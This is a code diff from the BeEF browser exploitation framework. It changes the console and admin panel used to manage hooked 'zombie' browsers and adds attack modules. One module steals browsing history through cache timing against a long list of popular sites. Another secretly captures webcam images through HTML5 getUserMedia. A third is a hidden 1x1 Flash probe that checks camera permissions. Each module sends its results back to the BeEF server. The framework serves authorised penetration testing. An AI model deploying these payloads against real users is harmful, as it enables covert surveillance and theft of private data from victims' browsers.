               </div>\
               ";
 
-    WelcomeTab.superclass.constructor.call(this, {
+  welcome = welcome.replace(/__BOOKMARKLETURL__/,bookmarklet);
+
+  WelcomeTab.superclass.constructor.call(this, {
 	region:'center',
 	padding:'10 10 10 10',
 	html: welcome,

extensions/admin_ui/media/javascript/ui/panel/common.js

@@ -249,12 +249,24 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 							html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
 							html += '<p>';
 							for(index in record.data.data) {
-								result = record.data.data[index];
+								result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/&lt;br&gt;/g,'<br>');
 								index = index.toString().replace('_', ' ');
-                                //output escape everything, but allow the <br> tag for better rendering.
-								html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
+								// Check if the data is the image parameter and that it's a base64 encoded png.
+								if (result.substring(0,28) == "image=data:image/png;base64,") {
+									// Lets display the image
+									try {
+										base64_data = window.atob(result.substring(29,result.length));
+										html += String.format('<img src="{0}" /><br>', result.substring(6));
+									} catch(e) {
+										beef.debug("Received invalid base64 encoded image string: "+e.toString());
+										html += String.format('<b>{0}</b>: {1}<br>', index, result);
+									}
+								} else {
+									// output escape everything, but allow the <br> tag for better rendering.
+									html += String.format('<b>{0}</b>: {1}<br>', index, result);
+								}
 							}
-							
+
 							html += '</p>';
 							return html;
 						}

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js

@@ -33,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) {
                 id = data.id;
             },
             error: function(){
-                console.log("Error getting module id.");
+                beef.debug("Error getting module id.");
             }
         });
         return id;
@@ -110,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) {
                     async: false,
                     processData: false,
                     success: function(data){
-                        console.log("data: " + data.command_id);
+                        beef.debug("data: " + data.command_id);
                         result = "Command [" + data.command_id + "] sent successfully";
                     },
                     error: function(){
-                        console.log("Error sending command");
+                        beef.debug("Error sending command");
                         return "Error sending command";
                     }
                 });
@@ -142,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) {
                         processData: false,
                         success: function(data){
                             $jwterm.each(data, function(i){
-                                console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
+                                beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
                                 results += $jwterm.parseJSON(data[i].data).data;
                             });
 
                         },
                         error: function(){
-                            console.log("Error sending command");
+                            beef.debug("Error sending command");
                             return "Error sending command";
                         }
                     });

extensions/console/lib/command_dispatcher/command.rb

@@ -10,9 +10,18 @@ module CommandDispatcher
   
 class Command
   include BeEF::Extension::Console::CommandDispatcher
+
+  @@params = []
   
   def initialize(driver)
     super
+    begin 
+      driver.interface.cmd['Data'].each{|data|
+        @@params << data['name']
+      }
+    rescue
+      return
+    end
   end
   
   def commands
@@ -41,12 +50,16 @@ class Command
     }
       
     print_line("Module name: " + driver.interface.cmd['Name'])
-    print_line("Module category: " + driver.interface.cmd['Category'])
+    print_line("Module category: " + driver.interface.cmd['Category'].to_s)
     print_line("Module description: " + driver.interface.cmd['Description'])
     print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0
 
     driver.interface.cmd['Data'].each{|data|
-      print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
+      if data['type'].eql?("combobox")
+        print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'] + " (Options include: " + data['store_data'].to_s + ")")
+      else
+        print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
+      end
     } if not driver.interface.cmd['Data'].nil?
   end
   
@@ -80,6 +93,16 @@ class Command
     print_status("Sets parameters for the current modules. Run \"cmdinfo\" to see the parameter values")
     print_status("  Usage: param <paramname> <paramvalue>")
   end
+
+  def cmd_param_tabs(str,words)
+    return if words.length > 1
+
+    if @@params == ""
+      #nothing prepopulated?
+    else
+      return @@params
+    end
+  end
   
   def cmd_execute(*args)
     @@bare_opts.parse(args) {|opt, idx, val|
@@ -119,6 +142,7 @@ class Command
         ])
 
     if args[0] == nil
+      lastcmdid = nil
       driver.interface.getcommandresponses.each do |resp|
         indiresp = driver.interface.getindividualresponse(resp['object_id'])
         respout = ""
@@ -126,6 +150,7 @@ class Command
           respout = "No response yet"
         else
           respout = Time.at(indiresp[0]['date'].to_i).to_s
+          lastcmdid = resp['object_id']
         end
         tbl << [resp['object_id'].to_s, resp['creationdate'], respout]
       end
@@ -133,6 +158,16 @@ class Command
       puts "\n"
       puts "List of responses for this command module:\n"
       puts tbl.to_s + "\n"
+
+      if not lastcmdid.nil?
+        resp = driver.interface.getindividualresponse(lastcmdid)
+        puts "\n"
+        print_line("The last response [" + lastcmdid.to_s + "] was retrieved: " + Time.at(resp[0]['date'].to_i).to_s)
+        print_line("Response:")
+        resp.each do |op|
+          print_line(op['data']['data'].to_s)
+        end
+      end
     else
       output = driver.interface.getindividualresponse(args[0])
       if output.nil?

extensions/console/lib/command_dispatcher/core.rb

@@ -141,13 +141,14 @@ class Core
         [
           'Id',
           'IP',
+          'Hook Host',
           'Browser',
           'OS',
           'Hardware'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
     end
     
     puts "\n"
@@ -174,12 +175,14 @@ class Core
         [
           'Id',
           'IP',
+          'Hook Host',
           'Browser',
-          'OS'
+          'OS',
+          'Hardware'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
     end
     
     puts "\n"
@@ -283,12 +286,21 @@ class Core
       offlinezombies << zombie.id
     end
     
-    if not offlinezombies.include?(args[0].to_i)
-      print_status("Browser does not appear to be offline..")
-      return false
-    end
+    targets = args[0].split(',')
+    targets.each {|t|
+        if not offlinezombies.include?(t.to_i)
+          print_status("Browser [id:"+t.to_s+"] does not appear to be offline.")
+          return false
+        end
+    #print_status("Adding browser [id:"+t.to_s+"] to target list.")
+    }
+
+    # if not offlinezombies.include?(args[0].to_i)
+    #   print_status("Browser does not appear to be offline..")
+    #   return false
+    # end
     
-    if not driver.interface.setofflinetarget(args[0]).nil?
+    if not driver.interface.setofflinetarget(targets).nil?
       if (driver.dispatcher_stack.size > 1 and
 	      driver.current_dispatcher.name != 'Core')
 	      driver.destack_dispatcher
@@ -299,7 +311,7 @@ class Core
       if driver.interface.targetid.length > 1
         driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
       else
-        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ")
+        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ")
       end
     end  
     
@@ -327,7 +339,12 @@ class Core
         driver.run_single("offline")
       when 'commands'
         if driver.dispatched_enstacked(Target)
+          if args[1] == "-s" and not args[2].nil?
+           driver.run_single("commands #{args[1]} #{args[2]}")
+           return
+         else
           driver.run_single("commands")
+        end
         else
           print_error("You aren't targeting a zombie yet")
         end

extensions/console/lib/command_dispatcher/target.rb

@@ -18,7 +18,7 @@ class Target
     begin
       driver.interface.getcommands.each { |folder|
         folder['children'].each { |command|
-          @@commands << folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+          @@commands << folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
         }
       }
     rescue
@@ -40,17 +40,29 @@ class Target
   
   @@bare_opts = Rex::Parser::Arguments.new(
 	  "-h" => [ false, "Help."              ])
+
+  @@commands_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help."],
+    "-s" => [ false, "<search term>"],
+    "-r" => [ false, "List modules which have responses against them only"])
   
   def cmd_commands(*args)
+
+    searchstring = nil
+    responly = nil
     
-    @@bare_opts.parse(args) {|opt, idx, val|
+    @@commands_opts.parse(args) {|opt, idx, val|
       case opt
         when "-h"
           cmd_commands_help
           return false
+        when "-s"
+          searchstring = args[1].downcase if not args[1].nil?
+        when "-r"
+          responly = true
         end
     }
-    
+
     tbl = Rex::Ui::Text::Table.new(
       'Columns' =>
         [
@@ -63,10 +75,29 @@ class Target
     
     driver.interface.getcommands.each { |folder|
       folder['children'].each { |command|
-        tbl << [command['id'].to_i,
-                folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"),
+
+        cmdstring = folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+
+        if not searchstring.nil?
+          if not cmdstring.downcase.index(searchstring).nil?
+            tbl << [command['id'].to_i,
+                cmdstring,
                 command['status'].gsub(/^Verified /,""),
                 driver.interface.getcommandresponses(command['id']).length] #TODO
+          end
+        elsif not responly.nil?
+             tbl << [command['id'].to_i,
+                cmdstring,
+                command['status'].gsub(/^Verified /,""),
+                driver.interface.getcommandresponses(command['id']).length] if driver.interface.getcommandresponses(command['id']).length.to_i > 0
+
+        else 
+         tbl << [command['id'].to_i,
+            cmdstring,
+            command['status'].gsub(/^Verified /,""),
+            driver.interface.getcommandresponses(command['id']).length] #TODO
+        end
+
       }
     }
     
@@ -78,6 +109,9 @@ class Target
   
   def cmd_commands_help(*args)
     print_status("List command modules for this target")
+    print_line("Usage: commands [options]")
+    print_line
+    print @@commands_opts.usage()
   end
   
   def cmd_info(*args)
@@ -133,7 +167,7 @@ class Target
     else
       driver.interface.getcommands.each { |x|
         x['children'].each { |y|
-          if args[0].chomp == x['text']+"/"+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+          if args[0].chomp == x['text'].gsub(/\s/,"_")+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
             modid = y['id']
           end
         }

extensions/console/lib/shellinterface.rb

@@ -310,7 +310,7 @@ class ShellInterface
         ['Hooked Page', 'Page Title',    'PageTitle'],
         ['Hooked Page', 'Page URI',      'PageURI'],
         ['Hooked Page', 'Page Referrer', 'PageReferrer'],
-        ['Hooked Page', 'Host Name/IP',  'HostName'],
+        ['Hooked Page', 'Hook Host',  'HostName'],
         ['Hooked Page', 'Cookies',       'Cookies'],
 
         # Host
@@ -328,22 +328,22 @@ class ShellInterface
 
       case p[2]
         when "BrowserName"
-          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
+          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(self.targetsession.to_s, p[2])).to_s
 
         when "ScreenSize"
-          screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          screen_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
           width  = screen_size_hash['width']
           height = screen_size_hash['height']
           cdepth = screen_size_hash['colordepth']
           data   = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
 
         when "WindowSize"
-          window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          window_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
           width  = window_size_hash['width']
           height = window_size_hash['height']
           data   = "Width: #{width}, Height: #{height}"
         else
-          data   = BD.get(zombie_session, p[2])
+          data   = BD.get(self.targetsession, p[2])
       end
 
       # add property to summary hash

modules/browser/get_visited_domains/command.js

@@ -133,7 +133,7 @@ if (beef.browser.isIE() == 1) {
 	var MAX_ATTEMPTS = 1;	
 }
 
-if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+if (beef.browser.isO() == 1){
     /****************
 	 * SCANNED URLS *
 	 ****************/
@@ -212,7 +212,7 @@ function perform_check() {
   if (beef.browser.isFF() == 1) {
   	setTimeout(wait_for_read, 1);
   }
-  if(beef.browser.isC() == 1 || beef.browser.isO() == 1){
+  if(beef.browser.isO() == 1){
     setTimeout(wait_for_read, 1);
   } 
 }
@@ -242,11 +242,10 @@ function wait_for_read() {
 		setTimeout(wait_for_read, 0);
 	  }	
    }
-   if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+   if (beef.browser.isO() == 1){
       try{
-        if(frames['f'].location.href != 'about:blank'){ 
-            throw 1;
-        }
+		
+        if(frames['f'].location.href != 'about:blank') throw 1;
         
         frames['f'].stop();
         document.getElementById('f').src = 'javascript:"<body onload=\'parent.frame_ready = true\'>"';
@@ -280,7 +279,7 @@ function navigate_to_target() {
   if (beef.browser.isIE() == 1) {
 	  setTimeout(wait_for_noread, 0);
   }
-  if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+  if (beef.browser.isO() == 1){
       setTimeout(wait_for_noread, 1);
   }
   urls++;
@@ -318,7 +317,7 @@ function wait_for_noread() {
     	}	
     	sched_call(wait_for_noread);    	
 	}
-    if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+    if (beef.browser.isO() == 1){
        if (frames['f'].location.href == undefined){
            confirm_visited = true;
            throw 1;
@@ -343,7 +342,7 @@ function maybe_test_next() {
   if (beef.browser.isIE() == 1) {
   	   document.getElementById("f").src = 'about:blank';
   }
-  if (beef.browser.isC() == 1 || beef.browser.isO() == 1) {
+  if (beef.browser.isO() == 1) {
       document.getElementById('f').src = 'about:blank';
   }
   if (target_off < targets.length) {
@@ -396,7 +395,7 @@ function reload(){
 /* The handler for "run the test" button on the main page. Dispenses
    advice, resets state if necessary. */
 function start_stuff() {
-  if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isC() == 1 || beef.browser.isO() == 1) {
+  if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isO() == 1) {
   	  target_off = 0;
 	  attempt = 0;
 	  confirmed_visited = false;
@@ -409,11 +408,139 @@ function start_stuff() {
   }  
 }
 
+/**************/
+/***Visipisi***/
+/**************/
+var vp_result = {};
+
+var visipisi = {
+  webkit: function(url, cb) {
+    var start;
+    var loaded = false;
+    var runtest = function() {
+      window.removeEventListener("message", runtest, false);
+      var img = new Image();
+      start = new Date().getTime();
+      try{
+      img.src = url;
+      } catch(e) {}
+      var messageCB = function (e){
+      var now = new Date().getTime();
+          if (img.complete) {
+            delete img;
+            window.removeEventListener("message", messageCB, false);
+            cbWrap(true);
+          } else if (now - start > 10) {
+            delete img;
+	    if (window.stop !== undefined)
+		window.stop();
+            else
+		document.execCommand("Stop",false);
+            window.removeEventListener("message", messageCB, false);
+            cbWrap(false);
+        } else {
+          window.postMessage('','*');
+      	}
+
+    };
+    window.addEventListener("message", messageCB, false);
+    window.postMessage('','*');
+  };
+  cbWrap = function (value) {cb(value);};
+  window.addEventListener("message", runtest, false);
+  window.postMessage('','*');
+  }
+};
+
+function visipisiCB(vp, endCB, sites, urls, site, result){
+    if(result === null){
+	vp_result[site] = 'Whoops';
+     }
+     else{	
+	vp_result[site] = result ? 'visited' : 'not visited';
+     }
+     var next_site = sites.pop();
+     if(next_site)
+	vp( urls[next_site], function (result) { 
+	  visipisiCB(vp, endCB, sites, urls, next_site, result);
+	});
+      else
+	endCB();
+}
+
+function getVisitedDomains(){
+    var tests = {
+	facebook: 'https://s-static.ak.facebook.com/rsrc.php/v1/yJ/r/vOykDL15P0R.png',
+	twitter: 'https://twitter.com/images/spinner.gif',
+	digg: 'http://cdn2.diggstatic.com/img/sprites/global.5b25823e.png',
+	reddit: 'http://www.redditstatic.com/sprite-reddit.pZL22qP4ous.png',
+	hn: 'http://ycombinator.com/images/y18.gif',
+	stumbleupon: 'http://cdn.stumble-upon.com/i/bg/logo_su.png',
+	wired: 'http://www.wired.com/images/home/wired_logo.gif',
+	xkcd: 'http://imgs.xkcd.com/s/9be30a7.png',
+	linkedin: 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
+	slashdot: 'http://a.fsdn.com/sd/logo_w_l.png',
+	myspace: 'http://cms.myspacecdn.com/cms/x/11/47/title-WhatsHotWhite.jpg',
+	engadget: 'http://www.blogsmithmedia.com/www.engadget.com/media/engadget_logo.png',
+        lastfm: 'http://cdn.lst.fm/flatness/anonhome/1/anon-sprite.png',
+        pandora: 'http://www.pandora.com/img/logo.png',
+        youtube: 'http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif',
+        yahoo: 'http://l.yimg.com/ao/i/mp/properties/frontpage/01/img/aufrontpage-sprite.s1740.gif',
+        google: 'https://www.google.com/intl/en_com/images/srpr/logo3w.png',
+        hotmail: 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.8/~/~/~/~/images/iconmap.png',
+        cnn: 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif',
+        bbc: 'http://static.bbc.co.uk/frameworks/barlesque/1.21.2/desktop/3/img/blocks/light.png',
+        reuters: 'http://www.reuters.com/resources_v2/images/masthead-logo.gif',
+        wikipedia: 'http://upload.wikimedia.org/wikipedia/en/b/bc/Wiki.png',
+        amazon: 'http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-22._V183711641_.png',
+        ebay: 'http://p.ebaystatic.com/aw/pics/au/logos/logoEbay_x45.gif',
+        newegg: 'http://images10.newegg.com/WebResource/Themes/2005/Nest/neLogo.png',
+        bestbuy: 'http://images.bestbuy.com/BestBuy_US/en_US/images/global/header/hdr_logo.gif',
+	walmart: 'http://i2.walmartimages.com/i/header_wide/walmart_logo_214x54.gif',
+	perfectgirls: 'http://www.perfectgirls.net/img/logoPG_02.jpg',
+        abebooks: 'http://www.abebooks.com/images/HeaderFooter/siteRevamp/AbeBooks-logo.gif',
+	msy: 'http://msy.com.au/images/MSYLogo-long.gif',
+	techbuy: 'http://www.techbuy.com.au/themes/default/images/tblogo.jpg',
+	borders: 'http://www.borders.com.au/images/ui/logo-site-footer.gif',
+	mozilla: 'http://www.mozilla.org/images/template/screen/logo_footer.png',
+	anandtech: 'http://www.anandtech.com/content/images/globals/header_logo.png',
+	tomshardware: 'http://m.bestofmedia.com/i/tomshardware/v3/logo_th.png',
+	shopbot: 'http://i.shopbot.com.au/s/i/logo/en_AU/shopbot.gif',
+	staticice: 'http://staticice.com.au/images/banner.jpg',
+  };
+
+  var sites = [];
+  for (var k in tests)
+    sites.push(k);
+   sites.reverse();
+
+   vp = visipisi.webkit;
+   var first_site = sites.pop();
+   var end = function() {
+    	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+prepResult(vp_result));
+   }
+   vp(tests[first_site], function(result) {
+	visipisiCB(vp, end, sites, tests, first_site, result);
+    });
+}
+
+function prepResult(results){
+    var result_str ='<br>';
+    for(r in results){
+      result_str += r + ':' + results[r]+'<br>';
+    }
+    return result_str;
+}
 
 beef.execute(function() { 
+  if(beef.browser.isC() == 1){
+	getVisitedDomains();
+
+  } else {  
    urls = undefined;
    exec_next = null;
    start_stuff();
+ }
 });
 
 	

modules/browser/get_visited_domains/config.yaml

@@ -10,7 +10,7 @@ beef:
             category: "Browser"
             name: "Get Visited Domains"
             description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/"
-            authors: ["@keith55", "quentin"]
+            authors: ["@keith55", "oxplot", "quentin"]
             target:
                 working: ["FF", "IE", "O"]
                 not_working: ["C", "S"]

modules/browser/hooked_domain/deface_web_page_component/config.yaml

@@ -10,6 +10,6 @@ beef:
             category: ["Browser", "Hooked Domain"]
             name: "Replace Component (Deface)"
             description: "Overwrite a particular component of the hooked page."
-            authors: ["antisnatchor","xntrik"]
+            authors: ["antisnatchor", "xntrik"]
             target:
                 user_notify: ['ALL']

modules/browser/webcam/command.js

@@ -22,7 +22,7 @@ beef.execute(function() {
     
     
     //These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
-    var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){  }';
+    var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+picture); }; function allPicturesTaken(){  }';
     
     //This function is called by swfobject, if if fails to add the flash file to the page
     

modules/browser/webcam_html5/command.js

@@ -0,0 +1,50 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+
+beef.execute(function() {
+    var vid_id = beef.dom.generateID();
+    var can_id = beef.dom.generateID();
+    var vid_el = beef.dom.createElement('video',{'id':vid_id,'style':'display:none;','autoplay':'true'});
+    var can_el = beef.dom.createElement('canvas',{'id':can_id,'style':'display:none;','width':'640','height':'480'});
+    $j('body').append(vid_el);
+    $j('body').append(can_el);
+
+    var ctx = can_el.getContext('2d');
+
+    var localMediaStream = null;
+
+    var cap = function() {
+        if (localMediaStream) {
+            ctx.drawImage(vid_el,0,0);
+            beef.net.send("<%= @command_url %>",<%= @command_id %>, 'image='+can_el.toDataURL('image/png'));
+        } else {
+            beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong');
+        }
+    }
+
+    window.URL = window.URL || window.webkitURL;
+    navigator.getUserMedia  = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;
+
+    navigator.getUserMedia({video:true},function(stream) {
+        vid_el.src = window.URL.createObjectURL(stream);
+        localMediaStream = stream;
+        setTimeout(cap,2000);
+
+    }, function(err) {
+        beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed');
+    });
+
+
+
+
+});
+
+
+
+
+

modules/browser/webcam_html5/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        webcam_html5:
+            enable: true
+            category: "Browser"
+            name: "Webcam HTML5"
+            description: "This module will leverage HTML5s WebRTC to capture webcam images. Only tested in Chrome, and it will display a dialog to ask if the user wants to enable their webcam."
+            authors: ["xntrik"]
+            target:
+                 user_notify: ["C"]
+                 unknown: ["All"]

modules/browser/webcam_html5/module.rb

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+require 'base64'
+class Webcam_html5 < BeEF::Core::Command
+  
+	def post_execute 
+		content = {}
+		content["result"] = @datastore["result"] if not @datastore["result"].nil?
+    content["image"] = @datastore["image"] if not @datastore["image"].nil?
+		save content
+	end
+
+end

modules/browser/webcam_permission_check/cameraCheck.as

@@ -0,0 +1,54 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Source ActionScript for cameraCheck.swf
+package {
+
+    import flash.display.Sprite;
+    import flash.external.ExternalInterface;
+    import flash.media.Camera;
+    import flash.system.Security;
+    import flash.system.SecurityPanel;
+
+    public class CamCheck extends Sprite {
+
+        var _cam:Camera;
+
+        public function CamCheck() {
+
+            if (Camera.isSupported)     {
+                this._cam = Camera.getCamera();
+
+                if (!this._cam) {
+
+	                //Either the camera is not available or some other error has occured
+                    ExternalInterface.call("naPermissions");
+
+                } else if (this._cam.muted) {
+
+	                //The user has not allowed access to the camera
+                    ExternalInterface.call("noPermissions");
+
+                    // Uncomment this show the privacy/security settings window
+                    //Security.showSettings(SecurityPanel.PRIVACY);
+                } else {
+
+                    //The user has allowed access to the camera
+                    ExternalInterface.call("yesPermissions");
+                }
+
+            } else {
+
+                //Camera Not Supported
+                ExternalInterface.call("naPermissions");
+
+            }
+
+        }
+
+    }
+
+}

modules/browser/webcam_permission_check/command.js

@@ -0,0 +1,79 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+beef.execute(function() {
+    
+       
+    //These 3 functions [naPermissions() The camera is not available or not supported
+    //					 yesPermissions() The user is allowing access to the camera / mic
+    //					yesPermissions() The user has not allowed access to the camera / mic
+    // Flash will invoke these functions directly.
+    //var js_functions = '<script>function noPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has not allowed  BeEF to access the camera :("); }; function yesPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has  allowed  BeEF to access the camera :D"); }; function naPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/"); }; ';
+
+    //This function is called by swfobject, if if fails to add the flash file to the page
+    
+    //js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
+
+    //These functions are global so they can accessed by the cameraCheck.swf file
+
+    noPermissions = function() {
+        beef.net.send("<%= @command_url %>",<%= @command_id %>,"result=The user has not allowed BeEF to access the camera :(");
+    }
+
+    yesPermissions = function() {
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has  allowed  BeEF to access the camera :D");
+    }
+
+    naPermissions = function() {
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/&unmount=true");
+    }
+
+    //After the swfobject loads the SWF file, this callback sends a status back to BeEF
+
+    var swfobjectCallback = function(e) {
+        if(e.success){
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");
+        } else {
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");
+        }
+    }
+
+
+    //This is the DIV for the flash object
+    
+    var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:1px;height:1px;opacity:0.8;"></div>';
+    $j('body').append(body_flash_container);
+
+    // Lets execute swfobject.js
+    // If it works, we then run it to embed the swf file into the above div
+    $j.getScript(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js',function(data,txtStatus,jqxhr) {
+        var flashvars = {};
+        var parameters = {};
+        parameters.scale = "noscale";
+        parameters.wmode = "opaque";
+        parameters.allowFullScreen = "true";
+        parameters.allowScriptAccess = "always";
+        var attributes = {};
+        swfobject.embedSWF(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf', "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);
+    });
+        
+    //A library that helps include the swf file
+    //var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
+    
+    //This is the javascript that actually calls the swfobject library to include the swf file 
+    //var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
+    
+
+    //Add flash content
+    //$j('body').append(js_functions, swfobject_script, body_flash_container, include_script);
